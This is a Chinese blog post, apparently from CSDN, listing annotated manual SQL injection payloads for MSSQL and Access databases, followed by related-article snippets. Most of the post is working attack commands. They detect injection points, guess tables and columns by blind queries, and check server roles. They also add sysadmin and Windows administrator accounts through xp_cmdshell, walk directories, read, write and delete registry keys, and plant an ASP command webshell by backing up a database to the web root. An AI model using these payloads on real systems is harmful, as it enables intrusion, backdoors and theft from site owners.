带注释手动注入脚本命令整理

最新推荐文章于 2024-02-26 16:11:58 发布
最新推荐文章于 2024-02-26 16:11:58 发布
阅读量705 收藏
点赞数
分类专栏: 安全 文章标签: 脚本 insert 数据库 xp table database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lin_zyang/article/details/1483541
版权

整理了下手动注入脚本命令[带注释]

 

1.判断是否有注入;and 1=1 ;and 1=2

 

2.初步判断是否是mssql ;and user>0

 

3.注入参数是字符’and [查询条件] and ’’=’

 

4.搜索时没过滤参数的’and [查询条件] and ’%25’=’

 

5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

 

6.猜数据库 ;and (select Count(*) from [数据库名])>0

 

7.猜字段 ;and (select Count(字段名) from 数据库名)>0

 

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

 

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

 

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

 

10.测试权限结构(mssql)

;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--

;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--

;and 1=(select IS_MEMBER(’db_owner’));--

 

11.添加mssql和系统的帐户

;exec master.dbo.sp_addlogin username;--

 

;exec master.dbo.sp_password null,username,password;--

 

;exec master.dbo.sp_addsrvrolemember sysadmin username;--

 

;exec master.dbo.xp_cmdshell ’net user username password

/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--

 

;exec master.dbo.xp_cmdshell ’net user username password /add’;--

 

;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--

 

12.(1)遍历目录

 

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree ’c:/’

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>)

 

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 获得所有子目录的目录树构

;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看文件的内容

 

13.mssql中的存储过程

 

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回所有键值

 

xp_regread 根键,子键,键值名

;exec xp_regread

’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’CommonFilesDir’ 返回制定键的值

 

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’TestValueName’,’reg_sz’,’hello’ 写入注册表

 

xp_regdeletevalue 根键,子键,值名

 

exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’TestValueName’ 删除某个值

 

xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey’ 删除键,包括该键下所有值

 

14.mssql的backup创建webshell

use model

create table cmd(str image);

insert into cmd(str) values (’<% Dim oScript %>’);

backup database model to disk=’c:/l.asp’;

 

15.mssql内置函数

;and (select @@version)>0 获得Windows的版本号

;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa

;and (select user_name())>0 爆当前系统的连接用户

;and (select db_name())>0 得到当前连接的数据库

 

16.简洁的webshell

 

use model

 

create table cmd(str image);

 

insert into cmd(str) values (’<%=server.createobject("wscript.shell").exec("cmd.exe /c

"&request("c")).stdout.readall%>’);

 

backup database model to disk=’g:/wwwtest/l.asp’;

 
lin_zyang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全——sql注入判断
W981113的博客
01-03 3806
?可以传递参数 sql数值型注入 1.判断注入点 ​ 数值型注入: ?id=1 and 1=1 , ?id=1 and 1=2 ​ 语句:select * from 表名 where id=1 and 1/2 2.猜字段数(二分法) ​ ?id=1 order by x 3.确定显示位 ​ ?id=-1 union select 1,2,3,4 --
SQL注入基础总结
IerkeU的博客
12-09 4211
一、什么是SQL注入? 答:SQL注入是比较常见的网络攻击方式之一,它不是利用OS的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句实现无账号登陆,甚至篡改数据库。 二、SQL注入的原理? 答:SQL注入攻击通过构建特殊的输入语句作为参数传入web应用程序,指的是服务器对用户输入数据过滤不严,导致服务器SQL语句被恶意篡改并成功 SQL注入的危害? 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。 SQL注入来的危害主要有如
有了这个网络安全面试题,面试就像开了挂!(附PDF)
最新发布
lvaolan的博客
02-26 650
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
SQL注入——猜测字段名称
weixin_30337251的博客
07-13 358
之前两篇文章所说的SQL注入手段均是在服务器层面是root权限,而现实的渗透测试过程中,很多都是无权读取information_schema库,并且很多拒绝联合访问Union和order by语句。遇到这些问题时候,就需要我们去爆破猜测一些数据库字开发逻辑,对一些列,表,内容进行猜测 猜测某个列 猜测abc这个列是否存在,网页提示: 说明我们所...
DVWA 之 SQL注入(非盲注)
天空之蓝的博客
11-17 1307
说明users表中有8个字段,分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。上面第一个SQL之所以失败,网上又说是编码格式的原因,修改表的编码格式一直就可以解决。说明执行的SQL查询语句中只有两个字段,即这里的First name、Surname。这里也可以通过输入union select 1,2,3…输入:1’ union select 1,2#输入:1’ union select 1#
整理了下手动注入脚本命令[注释]
01-02
1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ”=’ 4.搜索时没过滤参数的’and [查询条件] and ‘%’=’ 5.判断数据库系统 ;and ...
CTF中SQL注入常见题型整理.pdf
02-11
### CTF中SQL注入常见题型整理 #### 前言 在网络安全竞赛(CTF)中,SQL注入是常见的攻击手法之一。通过对网站输入的数据进行构造,攻击者可以利用SQL注入漏洞获取敏感数据,甚至控制整个数据库。本文将详细介绍...
防止xss和sql注入:JS特殊字符过滤正则
10-27
在网络安全领域,XSS(Cross-Site Scripting)和SQL注入是两种常见的攻击方式,对网站的安全性构成严重威胁。本文将详细介绍如何通过JavaScript特殊字符过滤正则表达式来防范这两种攻击。 首先,理解XSS攻击。XSS...
ctf xss注入.pdf
02-11
跨站脚本攻击(Cross-site scripting,简称XSS)是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本,当用户浏览该页面时,嵌入其中的脚本会被执行,从而达到恶意用户的特殊目的,如盗取用户数据、利用用户...
机械非标设计 SolidWorks宏命令
10-16
宏可以是单个命令,也可以是一系列命令的集合,通过录制或手动编写代码来创建。一旦创建,宏可以通过点击按钮、快捷键或者在特定事件触发时自动执行。 2. **非标设计与宏命令的结合** 在机械非标设计中,每个项目...
SQL注入详解(全网最全,万字长文)
热门推荐
m0_56691564的博客
10-23 3万+
一些概念:SQL:用于数据库中的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
Hibernate的hql查询加自定义字段
guanbao2015的博客
04-21 4381
hibernate的hql查询,用getHibernateTemplate能满足一般的数据查询,但需要自定义字段的时候,无需另外写sql查询,可以用的是hql的select new的方法,配合VO类。
Hibernate count如何映射?HQL别名字段问题?
LzwGlory的专栏
07-16 4133
问:hibernate, select name, count(*) from table group by name。这句话应该怎么用HQL语句执行?或者在hibernate中该怎么查出每个name对应的count?   答:String hql = "select name, count(*) from table group by name";   //跟sql语句差不多的,不过
SQL注入笔记(一)
要啥啥不行,偷懒第一名
05-01 491
SQL注入的基本过程图
sql注入猜测字段数的基本方法
bcbobo21cn的专栏
02-16 534
sql order by 可以根据列名,或数字指定第几个字段排序;
SQL注入——判断注入
Qeminco的博客。
10-27 3408
SQL注入漏洞 SQL注入漏洞基本原理 Web应用程序对用户输入的数据校验处理不严或者根本没有校验,致使用户可以拼接执行SQL命令。 可能导致数据泄露或数据破坏,缺乏可审计性,甚至导致完全接管主机。 ...
SQL注入
weixin_45735361的博客
02-18 391
SQL注入原理 SQL注入就是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻 击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库任意操作 SQL注入漏洞的产生需要满足两个条件: 参数用户可控 参数数据库查询,传入的参数拼接到SQL语句,并且数据库查询 SQL注入的危害 1.数据库敏感信息泄露 2.页面被窜改 3.数据...
sql注入详解
m0_46571665的博客
05-24 3292
# sql注入详解 ## SQLI介绍 SQLI,sql injection,我们称之为sql注入,sql(Structured Query Language),叫做结构化查询语句。在我们的应用系统使用 sql 语句进行管理应用数 据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接 sql 语句的 时候,我们可以改变 sql 语句。从而让数据执行我们想要执行的语句,这就是我们常说的 sql 注入。 ## 一、漏洞原理分析 sql注入的原理通俗的来说,就是通关SQL命令将web表单
批处理BAT脚本命令详解
- 这两个都是批处理中的注释命令,用于添加对脚本的说明,不被执行。 - rem命令后的注释会在执行时显示,而::则不会显示,提供了一种无回显的注释方式。 - rem在config.sys文件中也是可用的,而::则不能,因为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值